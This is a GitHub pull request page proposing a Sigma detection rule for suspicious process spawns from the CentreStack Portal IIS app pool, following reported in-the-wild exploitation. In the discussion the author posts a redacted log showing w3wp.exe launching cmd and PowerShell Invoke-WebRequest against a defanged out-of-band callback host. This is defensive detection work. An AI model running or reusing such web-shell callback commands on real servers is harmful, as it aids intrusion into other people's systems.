sigma icon indicating copy to clipboard operation
sigma copied to clipboard
verified publisher icon SigmaHQ

new: Suspicious Process Spawn by CentreStack Portal AppPool

Open RG9n opened this issue 9 months ago • 3 comments

Summary of the Pull Request

We have observed exploitation of this in the wild today. This rule was crafted based on that exploitation.

Changelog

new: Suspicious Process Spawn by CentreStack Portal AppPool

Example Log Event

We haven't seen any false positives yet, for redaction reasons cannot share the log execution that came after here.

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

RG9n avatar Apr 11 '25 22:04 RG9n

Hi, Can you give some references and a "redacted" log ? Thanks

frack113 avatar Apr 12 '25 09:04 frack113

Hello @frack113 , here is a redacted log: |----w3wp.exe IIS APPPOOL\portal 15100 w3wp.exe -ap "portal" -v "v4.0" -l "webengine4.dll" -a \.\pipe\redact -h "C:\inetpub\temp\apppools\portal\portal.config" -w "" -m | |----cmd.exe IIS APPPOOL\portal 14784 cmd.exe /c powershell.exe Invoke-WebRequest -Uri hxxp[://]redact[.]oastify[.]com/redact | |----powershell.exe IIS APPPOOL\portal 1240 powershell.exe Invoke-WebRequest -Uri hxxp[://]redacted[.]oastify[.]com/redact | |----conhost.exe IIS APPPOOL\portal 6604 conhost.exe 0xffffffff -ForceV1

RG9n avatar Apr 13 '25 19:04 RG9n

Since this is vuln related. I will be moving it to the ET folder

nasbench avatar Apr 16 '25 23:04 nasbench